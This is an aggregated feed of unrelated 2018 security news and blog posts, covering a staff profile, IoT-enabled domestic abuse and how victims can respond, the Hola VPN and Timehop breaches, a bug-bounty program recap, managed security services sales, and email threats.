The global village can be a pretty great place to live. But it can still be a challenge working across distances or boundaries – whether they be cultural, logistical, linguistic, or whatever else. But it’s a challenge that F-Secure’s Jani Kallio has taken since he joined the company with F-Secure’s acquisition of cyber security firm nSense in 2015.

“At nSense I started building our Security & Risk Management consulting practice as the Global Practice Leader. But during the 2 years since we joined F-Secure, I left that responsibility and my great team of 15 consultants, and transitioned to a business development role,” explains Jani. “Now, one of my key tasks is to prepare expansion opportunities for our consulting business through M&A.”

And Jani’s favorite part of this is finding common ground between different people – what he calls “a common language”. It’s something he’s been doing while based in London, since F-Secure acquired Digital Assurance Consulting – a small but reputable penetration testing company . Part of that process was his relocation to the city with his wife and daughter in summer 2017.

It’s a skill Jani uses to help F-Secure consulting expand further. “The best part of my job is when I’m able to identify similarities in cultures and untapped potentials which we could address together for mutual benefit,” said Jani. “When trying to motivate entrepreneurs into selling their company, it’s all about people. I need to sell the idea of F-Secure as a new home. It’s actually kind a match making process and it doesn’t work if you are not able to sell a joint vision.”

The cyber security business is still all about security, and you have to know what it means to customers, but Jani thinks it might surprise some people how differently that is seen across industries.

“In a single day, I can be in talks about the technical details of a security vulnerability with a consultant, discounted cash flow variables with a M&A advisor, business strategies with a senior entrepreneur, and coverage of cyber insurance with a broker or underwriter. It is a privilege, really, to be involved in so many different fields with different people.”

In terms of career advice, Jani has a few suggestions on how people could progress in the cyber security business.

“Choose a team who you can learn from, preferably strong in other areas than your own background. Choose a boss who believes in you. Share what you know with the people around you. And never stop learning, because this world will never slow down to wait for you to catch up.“

And if you’re looking for a career that will take you to different countries, remember to find things you have in common with the people around you, because there are bound to be differences. Some of them are really small, an example Jani discovered from working in London.

“Londoners have lunch over their keyboards and eat a good 2 hours later than I’m used to. Most restaurants do not even serve proper lunch before 12:00 in Soho, which is one thing I’m still getting used to.”

After Jani’s interview, F-Secure announced the acquisition of MWR InfoSecurity, a privately held cyber security company with close to 400 employees and operating globally from its HQ in London and other offices in the UK, the US, South Africa and Singapore.

And check out our open positions if you want to join Jani and the hundreds of other great fellows fighting to keep internet users safe from online threats.

IoT domestic abuse: What can we do to stop it?

Some 40 years ago, the sci-fi/horror film Demon Seed told the tale of a woman slowly imprisoned by a sentient AI, which invaded the smart home system her husband had designed to manage it. The AI locked doors, windows, turned off communications, and even put a synthesised version of her onscreen at the front door to reassure visitors she was “fine.”

The reality, of course, is that she was anything but. There’s been endless works of fiction where smart technology micromanaging the home environment have gone rogue. Sadly, those works of fiction are bleeding over into reality.

In 2018, we suddenly have the real-world equivalent playing out in homes and behind closed doors. We’ll talk about the present day problems momentarily, but first let’s take a look how we got here by casting our eye back about 15 years ago.

PC spyware and password theft

For years, a subset of abusive partners with technical know-how have placed spyware on computers or mobile devices, stolen passwords, and generally kept tabs on their other half. This could often lead to violence, and as a result, many strategies for defending against this have been drawn up down the years. I effectively became involved in security due to a tech-related abuse case, and I’ve given many talks on this subject dating back to 2006 alongside representatives from NNEDV (National Network to End Domestic Violence).

Consumer spyware is a huge problem, and tech giants such as Google are funding programs designed to help abused spouses out of technological abuse scenarios.

The mobile wave and social control

After PC-based spyware became a tool of the trade for abusers, there came an upswing in “coercive control,” the act of demanding to check emails, texts, direct messages and more sent to mobile phones. Abusive partners demanding to see SMS messages has always been a thing, but taking your entire online existence and dumping it into a pocket-sized device was always going to raise the stakes for people up to no good.

Coercive control is such a serious problem that the UK has specific laws against it, with the act becoming a crime in 2015. Should you be found guilty, you can expect to find yourself looking at a maximum of five years imprisonment, or a fine, or both in the worst cases. From the description of coercive control:

Coercive or controlling behaviour does not relate to a single incident, it is a purposeful pattern of incidents that occur over time in order for one individual to exert power, control, or coercion over another.

Keep the “purposeful pattern of incidents occurring over time in order for an individual to exert power or control” description in mind as we move on to the next section about Internet of Things (IoT) abuse, because it’s relevant.

Internet of Things: total control

An Internet of Things control hub could be a complex remote cloud service powering a multitude of devices, but for most people, it’s a device that sits in the home and helps to power and control appliances and other systems, typically with some level of Internet access and the possibility of additional control via smartphone. It could just be in charge of security cameras or motion sensors, or it might be the total package: heating and cooling, lighting, windows, door locks, fire alarms, ovens, water temperature—pretty much anything you can think of.

It hasn’t taken long for abusive partners to take advantage of this newly-embedded functionality, with numerous tales of them making life miserable for their loved ones, effectively trapped in a 24/7 reworking of a sci-fi dystopian home.

Their cruelty is only limited by what they can’t hook into the overall network. Locking the spouse into their place of residence then cranking up the heat, blasting them with cold, flicking lights on and off, disabling services, recording conversations, triggering loud security alarms; the abused partner is almost entirely at their mercy.

There are all sorts of weird implications thrown up by this sort of real-world abuse of technologies and individuals. What happens if someone has an adverse reaction to severe temperature change? An epileptic fit due to rapidly flickering lights? How about someone turning off smoke alarms or emergency police response technology and then the place burns down or someone breaks in?

Someone could well be responsible for a death, but how would law enforcement figure it out, much less know where to pin the blame?

Of course, those are situations where spouses are still living together. There are also scenarios where the couple has separated, but the abuser still has access to the IoT tech,  and they proceed to mess with their lives remotely. One is a somewhat more straightforward to approach than the other, but neither are particularly great for the person on the receiving end.

A daunting challenge

Unfortunately, this is a tough nut to crack. Generally speaking, advice given to survivors of domestic abuse tends to err on the side of extreme caution, because if the abuser notices the slightest irregularity, they’ll seek retribution. With computers and more “traditional” forms of tech-based skullduggery, there are usually a few slices of wiggle room.

For example, an abused partner may have a mobile device, which is immediately out of reach from the abuser the moment they go outside—assuming they haven’t tampered with it. On desktop, Incognito mode browsing is useful, as are domestic abuse websites which offer tips and fast close buttons in case the abuser happens to be nearby.

Even then, though, there’s risk: the abuser may keep network logs or use surveillance software, and attempts to “hide” the browsing data may raise suspicions. In fact, this is one example where websites slowly moving to HTTPs is beneficial, because an abuser can’t see the website data. Even so, they may still see the URLs and then you’re back to square one.

With IoT, everything is considerably much more difficult in domestic abuse situations.

A lot of IoT tech is incredibly insecure because functionality is where it’s at; security, not so much. That’s why you see so many stories about webcams beamed across the Internet, or toys doing weird things, or the occasional Internet-connected toaster going rogue.

The main hubs powering everything in the home tend to be pretty locked down by comparison, especially if they’re a name brand like Alexa or Nest.

In these situations, the more locked down the device, the more difficult it is to suggest evasion solutions for people under threat. They can hardly jump in and start secretly tampering with the technology without notice—frankly people tend to become aware if a physical device isn’t acting how it should a lot faster than their covert piece of spyware designed to grab emails from a laptop.

All sorts of weird things can go wrong with some purchased spyware. Maybe there’s a server it needs to phone home to, but the server’s temporarily offline or has been shut down. Perhaps the Internet connection is a bit flaky, and it isn’t sending data back to base. What if the coder wasn’t good and something randomly started to fall apart? There’s so many variables involved that a lot of abusers might not know what to do about it.

However, a standard bit of off-the-shelf IoT kit is expected to function in a certain way, and when it suddenly doesn’t? The abuser is going to know about it.

Tackling the problem

Despite the challenges, there are some things we can do to at least gain a foothold against domestic attackers.

1) Keep a record: with the standard caveat that doing action X may attract attention Y, a log is a mainstay of abuse cases. Pretty much everyone who’s experienced this abuse and talks about it publicly will say the same thing: be mindful of how obvious your record is. A book may work for some, text obfuscated in code may work for others (though it could attract unwarranted interest if discovered). It may be easier to hide a book than keep them away from your laptop.

Of course, adjust to the situation at hand; if you’re not living with the abusive partner anymore, they’re probably not reading your paper journal kept in a cupboard. How about a mobile app? There are tools where you can detail information that isn’t saved on the device via programs designed to look like weather apps. If you can build up a picture of every time the heating becomes unbearable, or the lights go into overdrive, or alarms start buzzing, this is valuable data for law enforcement.

2) Correlation is a wonderful thing. Many of the most popular devices will keep detailed statistics of use. Nest, for example, “collects usage statistics of the device” (2.1, User Privacy) as referenced in this Black Hat paper [PDF]. If someone eventually goes to the police with their records, and law enforcement are able to obtain usage statistics for (say) extreme temperature fluctuations, or locked doors, or lightbulbs going berserk, then things quickly look problematic for the abuser.

This would especially be the case where device-recorded statistics match whatever you’ve written in your physical journal or saved to your secure mobile app.

3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, which is keeping at least one compromised device running to make the abuser think all is well is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

Today’s highly automated and connected smart factories (Industry 4.0) were born out of yesterday’s steam engines that mechanized manufacturing (Industry 1.0); mass-production lines expanded with the advent of electricity (Industry 2.0); and then IT-enabled manufacturing plants ushered in the era of connected industrial control systems with programmable logic controllers (PLC).

While enterprises struggle to enhance their operational efficiency, customer experience, logistics, and supply chain gains through IoT use, their malicious counterparts may be expending just as much resource to undermine their efforts. We have seen attacks adversely affect an enterprise’s bottom line in the past. Cases in point include a DDoS attack on Dyn’s servers that brought down major sites, including PayPal, Spotify, Netflix, and Twitter in October 2016 and an IT failure that drove British Airways to freeze thousands of its Executive Club frequent-flier accounts in March 2017 after confirming unauthorized activity from a third party.

In December last year, TRITON/TRISIS reared its ugly head, and can be considered the latest addition to ICS attackers’ armory. ICS lie at the core of the cyber-physical systems that characterize the Industry 4.0 era. The TRITON/TRISIS attack showed that at the hands of determined threat actors, a single piece of malicious code could have physical repercussions.

In the Industry 4.0 era, enterprises not only need to worry about the usual business disrupters—natural disasters, adverse publicity, and loss of key personnel, among others—but also increasingly sophisticated cyberthreats targeting critical infrastructure and the smart devices that we use to virtually control them. Modern ICS are prone to vulnerabilities that attackers can exploit to get into target networks. Industrial robots or any connected system that remains exposed can easily be scanned for vulnerabilities that, when exploited, can lead to the production of defective goods. Insufficiently secured IoT devices, when hacked, can be used to instigate DDoS and other business-crippling attacks.

We are bound to see more of these as companies increasingly embrace the advantages that smart factories, industrial robots, and the many other components that make up IIoT-enabled environments and the Industry 4.0 era offer. Enterprises will need to mitigate risks more than ever. They will need an integrated approach to security that begins with a cybersecurity framework. Any secure smart environment should have a sound foundation that uses next-generation intrusion detection and prevention, application whitelisting, integrity monitoring, virtual patching, advance sandboxing analysis, machine learning, behavior analysis, antimalware, risk detection, vulnerability assessment, next-generation firewall, anti-spear-phishing, spam protection, and data leakage technologies. Deploying a risk-reducing architecture and staying abreast of the latest in cybersecurity (threats and possible mitigation steps) by relying on trusted partners are also a must to protect all connected devices and environments on all fronts.

Read more about mitigating risks in today’s smart environments in IIoT Security Risk Mitigation in the Industry 4.0 Era.

The post How the Industry 4.0 Era Will Change the Cybersecurity Landscape appeared first on .

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program. The Center for […]… Read More

The post The Five Stages of Vulnerability Management appeared first on The State of Security.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW customers who used Hola VPN within the last 24 hours, to transfer their funds immediately to a brand new account. They said they received a report that confirms the Hola VPN Chrome extension has been hacked. MEW’s Twitter account stated the attack was logging users’ activity including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to hackers during a five-hour window on July 9th.

Hola VPN said in a blog post that upon learning about the incident, they immediately set up a response team of cybersecurity experts to investigate the incident and prevent it from happening again. They claim they immediately took emergency steps to replace the malicious extension causing the data leak. Regular MEW users were not affected by the data breach as the MEW service was not compromised, and the incident is known to be entirely out of MEW developers’ control. However, the breach certainly throws a shadow at the Israeli VPN service provider.

This is not the first time MEW users are being targeted. Earlier this year hackers managed to snatch more than $300,000 through execution of a sophisticated DNS hijacking attack. Many users lost their funds forever. Services such as MyEtherWallet do not operate like banks –  they do not charge transactions fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide users with an interface that allows their clients to interact directly with the blockchain. Hugely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users are the only one responsible for the funds they store on such virtual wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be https://www.myetherwallet.com. Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

Lastly, make sure that you have antivirus software installed on all your connected devices, and you deal with reliable VPN service providers. As in real life, cheap (or free) sometimes end up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!

Download Panda FREE VPN

The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

SN 671: STARTTLS Everywhere

This week we discuss another worrisome trend in malware, another fitness tracking mapping incident and mistake, something to warn our friends and family to ignore, the value of periodically auditing previously-granted web app permissions, when malware gets picky about the machines it infects, another kinda-well-meaning Coinhive service gets abused, what are the implications of D-Link losing control of its code signing cert?, some good news about Android apps, iOS v11.4.1 introduces "USB Restricted Mode"... but is it?, a public service reminder about the need to wipe old thumb drives and memory cards, what about those free USB fans that were handed out at the recent North Korea / US summit?... and then we take a look at eMail's STARTTLS system and the EFF's latest initiative to increase its usefulness and security.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Building a Profitable Security Services Offering Part 2 IT Security Features and Benefits Overview

Trend Micro is excited to partner with SPC International in this 5-part Blog, Webinar and Online Training Series; focused on Building a Profitable Security Services Offering for MSP Partners.  Through the series, SPC will teach you a selling process of leading with security, steps in growing your recurring managed security services revenue and provide you the tools to make it happen.

We value and invest in Trend Micro MSP Partners to help:

 

  • Maximize Your Cash Flow – self-provision licenses, pay-as-you-go monthly billing, no upfront or minimum costs
  • Enhance the Tools You’re Already Using – integration with 3rd party RMM and PSA (Autotask, ConnectWise & Kaseya)
  • Optimize Your Productivity – manage multiple customers from a single console, anywhere, anytime

Building a Profitable Security Services Offering

Introduction

Security is the number one concern of business owners today. This isn’t surprising, with all of the hacks, breaches, data thefts, ransomware attacks and privacy violations that we hear about on a daily basis. And those are just the ones we know about – according to the Online Trust Alliance’s (OTA) “Cyber Incident & Breach Trends Report,” cybersecurity incidents nearly doubled from about 82,000 in 2016 to 160,000 or so in 2017. But the report also notes that this number could easily be more than double that, as so many breaches are unreported.

The necessity to thwart these cybercriminals and protect critical business, financial, healthcare data and more has created a tremendous opportunity for IT service providers to evolve to meet this challenge and benefit from a continually growing revenue stream.

In this 5-part blog series and its companion Webinars, I’ll dive deep into the topic of building a profitable security services offering and cover essential topics such as the services that comprise different levels of security offerings; as well as how to lead with security to prospect effectively and set appointments, and how to price, position and sell these services. And once sold, I’ll cover how to properly On-Board new clients and share a strategy to continue to realize healthy ongoing security project profits and exponentially growing recurring managed security services revenues on an ongoing basis.

Watch On-Demand Webinar #2IT Security Services Features and Benefits’ (URL:  https://th115.infusionsoft.com/app/page/72b7ce05e5518db3a86601a69720d931)

Part 2: IT Security Features and Benefits Overview

We know that Security is the #1 concern of today’s business owners, regardless of the industry they serve, and strategic leaders understand that they must increase their security posture to protect their data, systems and users against internal and external threats.

Therefore, offering IT security services is a strategic client service and control point for security providers. These high value, high margin services represent a stable, growing revenue opportunity with an extremely low barrier to entry and delivery.

What are Managed IT Security Services? 

Managed IT Security Services are a defined set of onsite or remotely-delivered services that are prepaid for at a fixed rate on a recurring basis, where the security provider assumes complete responsibility for the management and delivery of these security services and their outcome.

In addition, these services are governed by a Service Level Agreement or SLA, and are scheduled, preventative and proactive. On the other hand, Managed IT Security Services are not measured by time invested. Nor are they reactive services. Finally, they are not billed for on a time and materials basis.

The Old Way of delivering security services vs. The New Way 

The old way of delivering security services to clients means that the service provider is most profitable when their client is in the most pain, as the price of reactive, emergency security remediation services are always higher than scheduled, monitored, preventative services.

And clients are never prepared to pay for these reactive, costly emergencies, which negatively impact their cash flow and operations, and in extreme cases, their brand, image and customer relationships, and create tension between them and their reactive security provider.

The new way of delivering Managed IT Security Services is much more attractive and beneficial to clients, as the security provider actively seeks out and delivers security solutions to protect their clients’ data and environments from security incidents and manages security risk and response for a flat monthly fee.

Because the Managed Security Services Provider; or MSSP, assumes more risk in the relationship, if they are to be profitable, they must ensure their client’s security and reduce vulnerabilities.

As a result, the MSSP is more profitable when their clients experience less threats, and their business goals align with their clients’ in this respect.

This reality creates a much stronger business partnership than a typical vendor relationship for the MSSP and their clients and paves the way for acceptance as a Trusted Advisor.

What comprises a security offering and what are its benefits? 

A basic security portfolio typically includes Firewall Management, Anti-Virus and Anti-Malware solutions, desktop and server operating system security, Email Security, Web Content or URL Filtering, Mobile Security, Data security including Backups, end-user Security Awareness Training and more.

And there are a variety of advantages for a client when engaging an MSSP, including enjoying a high level of confidence that drives continued innovation in their organization, instead of worrying so much about security threats that this concern stifles growth strategies and activities.

Along with improving their compliance posture, clients enjoy rapid detection and remediation of threats at much lower costs than reactive, “after the event” security remediation services, and gain a stronger posture to reduce insider fraud and theft, along with guarding against data leakage.

In addition, a clear path and process to identify and quickly address security incidents brings clients peace of mind, and predictable monthly fees allow them to budget for security more effectively for the long term.

When presented properly to a prospect, these and other factors make a compelling argument to engage in a managed IT security services relationship.

Security Services bundling and pricing 

To provide the best opportunity to engage with as many prospects as possible while maintaining healthy margins, the MSSP will bundle and tier their services to offer various distinct packages, with each successively higher-priced option adding more qualitative value in terms of services and benefits, along with more attractive Service Level Agreements; or SLAs, that govern response time. This allows prospects to select the option that makes the most sense for their specific business needs, risk profile and budget.

There are several considerations for the MSSP when determining their pricing model, and they can price their services in several ways, such as per endpoint, per user or as the aforementioned tiered or bundled services. Or they may price strictly on value alone, with each opportunity quoted individually.

Their ultimate pricing strategy will also be informed by other factors, such as their SLAs’ response times and the hours they provide service to their client  – 8 to 5 Monday through Friday, 24×7, or on holidays or weekends.

Once the appropriate service bundle or tier is selected by the client, the MSSP will provide them a Scope of Work or SOW, that clearly defines what is included and covered in the service relationship, and what is not. Typically, the SOW covers all of the agreed-upon security maintenance and service work the MSSP delivers for the specified endpoints, devices and users within the SLA.

New users added, or new services or licenses installed or provisioned after service go-live normally fall outside the scope of an existing SOW, and will typically be added to the client’s overall agreement at an increased monthly fee by having the client authorize a new SOW or an addendum to the existing SOW.

And to preserve margins, best in class MSSPs will understand the true cost of delivering their services to their clients; including the cost of 3rd party security products and services they bundle into their offerings and establish a minimum desired margin for these deliverables.

Using a pricing calculator helps ensure margin attainment and speeds pricing activities. Once the minimum price is established for a client, the security sales professional will try to increase the ultimate price by using consultative sales techniques to sell on value.

The value of becoming the Trusted Advisor as an MSSP

A Trusted Advisor is a critical business asset for their clients, as they work to understand their client’s business needs and priorities and develop strategies to actively seek out solutions to improve daily workflows, processes and procedures and improve security to best assist their clients reduce risk and reach their business goals.

An effective Trusted Advisor earns their client’s loyalty by understanding their external competitive challenges as well as their internal operational challenges and works to help their clients advance their value proposition to their target market, improve client service, sales, marketing and back-office operational processes through technology to help their clients retain and expand their market base.

These are the reasons that MSSPs operating as mature Trusted Advisors are so successful at consistently identifying up-sell and cross-sell opportunities for new solutions to their clients while increasing their satisfaction.  Watch On-Demand Webinar #2IT Security Services Features and Benefits’ (URL:  https://th115.infusionsoft.com/app/page/72b7ce05e5518db3a86601a69720d931)

Next time on Building a Profitable Security Services Offering: Part 3: Qualifying Prospects for Security Services and Solutions

About Erick Simpson

Co-Founder, Senior Vice President and CIO of MSP University and SPC International Online, Erick Simpson is a strategic IT business transformation specialist that improves top and bottom-line business performance by increasing operational and service efficiencies, helps build and grow new or improve existing MSP and Cloud business practices with proven sales and sales engineering, project management and help desk processes; and packaging, bundling and tiering profitable MRR service offerings.

30+ years of experience in the IT industry as an Enterprise CIO and one of the 1st pure-play MSPs in the industry (acquired in 2007), Erick is a business process improvement expert with hundreds of successful ITSP, MSP, Security and Cloud improvement engagements, and has worked with numerous clients on the buy, sell and integration sides of the M&A process.

A highly sought-after IT, Cloud, Security and Managed Services business growth specialist and speaker, Erick has authored over 40 business improvement best practice guides and 4 best-selling books, including “The Guide to a Successful Managed Services Practice”, the definitive book on Managed Services, and the follow-ups in his Managed Services Series “The Best I.T. Sales & Marketing BOOK EVER!” and “The Best I.T. Service Delivery BOOK EVER!” and “The Best NOC and Service Desk Operations BOOK EVER!”

LinkedIn

The post Building a Profitable Security Services Offering Part 2 IT Security Features and Benefits Overview appeared first on .

Apple’s new USB security feature has a major loophole

Apple's new USB Restricted Mode, which dropped with the iOS 11.4.1 release yesterday, may not be as secure as previously thought. The feature is designed to protect iPhones against USB devices used by law enforcement to crack your passcode, and works by disabling USB access after the phone has been locked for an hour. Computer security company ElcomSoft, however, has found a loophole.

Source: ElcomSoft

Cars Are Just Primitive Exoskeletons

The “carriage” form-factor is ancient.

So even though today we say “car” instead of carriage, we should know that to augment a single person’s travel with a giant opulent box is primitive thinking, and obviously doesn’t scale well to meet modern transit needs. Study after study by design experts have shown us how illogical it is to continue to build and use cars:

Fortunately, modern exoskeletons are more suited (no pun intended) to the flexibility of both the traveler and those around. Rex is a good example of why some data scientists are spending their entire career trying to unravel “gait” in order analyse and improve the “signature” of human movement. They discuss here how they are improving mobility for augmentation of a particular target audience:

This is an early-stage and yet it still shows us how wrong it is to use a car. When I expand such technology use to everyone I imagine people putting on a pair of auto-trousers to jog 10 miles at 20 mph to “commute” while exercising, or to lift rubble off people for 12 hours without breaks after an earthquake, or both.

We already see this class of power-assist augmented travel in tiny form-factors in the latest generation of electric bicycles, like the Shimano e8000 motor. It adds power as a cyclist pedals, creating a mixed-drive model:

For what it’s worth, the “gait” (wobble) of bicycles also is super complicated and a rich area of data science research. Robots fail miserably (nice try Yamaha) to emulate the nuance of controlling/driving two-wheels. Anyone saying driverless cars will reduce deaths isn’t looking at why driverless cars are more likely than human drivers to crash into pedestrians and cyclists. Any human can ride a bicycle, but to a driverless car this prediction tree is an impenetrable puzzle:

Unlike sitting in a cage, the possibilities of micro-engines form-fitted to the human body are seemingly endless, just like the branches in that tree. So it makes less and less sense for anyone to want cages for personal transit, unless they’re trying to make a forceful statement by taking up shared space to deny freedom to others.

What is missing in the above sequence of photos? One where cars are completely gone, like bell-bottom trousers, because they waste so much for so little gain, lowering quality of life for everyone involved.

Floating around in a giant private box really is a status thing, when you think about it. It’s a poorly thought out exoskeleton, like a massive blow-up suit or fluffy dress that everyone has to clean up after (and avoid being hit by). Here’s some excellent perspective on the stupidity of carrying forward the carriage design into modern transit:

Rapstatus tells us cars still get a lot of lip service so I suspect we’re a long way from carriages being relegated to ancient history, where they belong.

Nontheless I’m told new generations have less patience for carriages, and so I hope already they visualize something like this when people ask them if they would get in a car to get around…

Timehop admits attacker stole 21 million users’ data

Timehop, a popular app that reminds you of your social media posts from the same day in past years, is the latest service to suffer a data breach. The attacker struck on July 4th, and grabbed a database which included names and/or usernames along with email addresses for around 21 million users. About 4.7 million of those accounts had phone numbers linked to them, which some people use to log in with instead of a Facebook account.

Via: The Register

Source: Timehop

Zero Day Initiative: A 1H2018 Recap

When the Zero Day Initiative (ZDI) was formed in 2005, the cyber threat landscape was a bit different from what we see today. Threats were a little less sophisticated, but there was one thing that we saw then that we still see now: the shortage of cybersecurity professionals and researchers. The team decided that with ZDI, they could augment the internal team with the expertise of external researchers. In addition, ZDI would promote responsible vulnerability disclosure to affected vendors and protect our customers ahead of a vendor patch. As you probably suspected, the launch of ZDI was met with skepticism, with people saying things like “the ZDI is promoting hacking by creating a market for vulnerabilities” and “they’re going to fail,” but the team was determined to make this program work.

Fast forward to 2018. Now in its thirteenth year (coming up on July 25), the ZDI manages the largest vendor-agnostic bug bounty program in the world with over 3,500 external researchers complementing the internal team’s efforts. The surge of over 500 new registered researchers in the first half of 2018 alone is a testament to the appeal and benefits that the ZDI program offers to those who want to conduct responsible security research and be appropriately compensated for their efforts. Since the program’s inception, over $18 million USD has been awarded to external researchers. This is quite an accomplishment given that there was only one submission in the first year of the program. Contributions to the ZDI program have been growing steady since 2010 and in the first half of 2018, the ZDI published a record-breaking 600 advisories, paying researchers over $1 million USD.

But the benefits of ZDI go beyond the researcher community – Trend Micro customers also benefit from the vulnerability research conducted by the ZDI. The insights on threat and exploit trends that the team sees from external researchers, as well as their own internal research, has led to increased focus on SCADA and Industrial IoT (IIoT) vulnerabilities, which make up approximately 30% of submissions this year. The ZDI also works very closely with ICS-CERT and was the number one supplier of SCADA/ICS vulnerabilities in 2017. Trend Micro customers also benefit through preemptive protection for vulnerabilities that come through the ZDI program. Patch management is a constant headache for most organizations, and it can become a flat-out nightmare if a zero-day hits and you have hundreds of systems to patch. Filters that are created as a result of the exclusive access to vulnerability information from ZDI provide protection an average of 72 days before a patch is available and can play a key role in alleviating the patch management headache with a virtual patch at the network level while you work to update systems or wait for a vendor patch. Trend Micro is one of the few security vendors that has the breadth and depth of vulnerability research that results in this level of protection coverage. Does every vulnerability submitted to the program get exploited? No. But just like I carry automotive insurance “just in case” I get in a car accident, think of the ZDI program along the same lines – an extra level of protection “just in case” you can’t patch your systems in time in the event a vulnerability submitted through our program is exploited before a patch is issued by the affected vendor.

The continued growth of the Zero Day Initiative bug bounty program and leadership in vulnerability research can only lead to more secure products and more secure customers. Many vulnerabilities would continue to either remain behind closed doors, or be sold to the black market and used for corrupt purposes. Accountability is paramount to the program, and over the course of 13 years, the ZDI has worked to build trust with leading software vendors and the research community to promote the importance of security in the product development lifecycle. As the threat landscape evolves, the ZDI will evolve with it and stay on the forefront of vulnerability research to make our technology world a safer place.

For more details on the ZDI’s record first half of 2018 and the trends they’re seeing, check out Brian Gorenc’s blog here. You can also follow the team on Twitter at @thezdi for the latest updates.

The post Zero Day Initiative: A 1H2018 Recap appeared first on .

Emails, the gateway for threats to your company

It’s an undeniable fact: these days, email has become one of the main vectors for cyberattacks against companies.  According to the recent 2018 Email Security Trends report by Barracuda, 87% of IT security professionals have admitted that their company has faced some kind of threat via email in the last year. This has led three quarters of the professionals surveyed to be more concerned about this risk factor now than they were five years ago.

And this concern hasn’t appeared out of the blue. The same study has shown that 81% of heads of corporate IT security have noticed an increase in the number of cases compared to the situation one year ago.  What’s more, a quarter of the professionals who agree with this statement qualify the increase as “drastic”.

But why is the volume of cyberattacks carried out over email on the up?  Just like with other kinds of threats, the success of these attacks can be put down to human error: whether it’s due to a lack of time to stop and assess the authenticity of the email, or because of our innate sense of curiosity or compassion, mechanisms like social engineering do exactly what they set out to achieve. This is the opinion shared by the vast majority of the IT professionals surveyed; they single out “poor employee behavior” as their main concern when dealing with these cyberthreats.

Mitigation costs are rising drastically

The economic consequences of these attacks are also increasing.  81% of heads of cybersecurity agree with this statement, emphasizing, in 22% of cases, that the costs stemming from mitigating a security breach have grown very significantly.

Of the different types of malicious actions that can financially damage a company via email, information theft, ransomware, and BEC scams are the most costly.  In other words, we’re facing two types of cyberattacks: on the one hand, we have attacks that seek to make a profit by attacking a company’s information and either selling it, or kidnapping it in order to demand a ransom. On the other hand, we see attacks whose aim is to trick an employee who has access to the company finances into making a transfer to the cybercriminals without realizing.  In a previous post, we saw how this last kind of scam, Business Email Compromise, became the most lucrative cybercrime of 2017 in the USA.

How can I deal with this threat in my company?

The fact that human error plays such a key role in the success of this kind of scam of course means that companies must train employees at all levels to pay attention to tell-tale signs in suspicious emails: how they’re written, spelling, or the kind of links they contain.  Likewise, they must get into the habit of thoroughly verifying the supposed intention of any emails received: for example, by checking with the finance department that the bank transfer that they are being asked for is legitimate, in order to avoid BEC scams.

But is this enough? The heads of IT security who responded also recommended some other measures that should be kept in mind:

  • Phishing drills: This highly effective method to test the possible negative effects of phising consists of surprising your employees with this kind of email, to see how they react. Those who get tricked by the email will have learned for themselves the type of behavior they must avoid in the future, whereas those who pass the test will still be alert as they were before.
  • Social engineering detection: This requires a specific, practical training process for employees. The aim is to make sure they ask themselves a series of questions before replying or paying attention to a dubious email. Here are some examples of this type of question: “Can a third party help me verify the identity of the person who is contacting me?”, “Am I really authorized to carry out the thing they’re asking me to do?”, “Is the action or information that they are requesting public?”
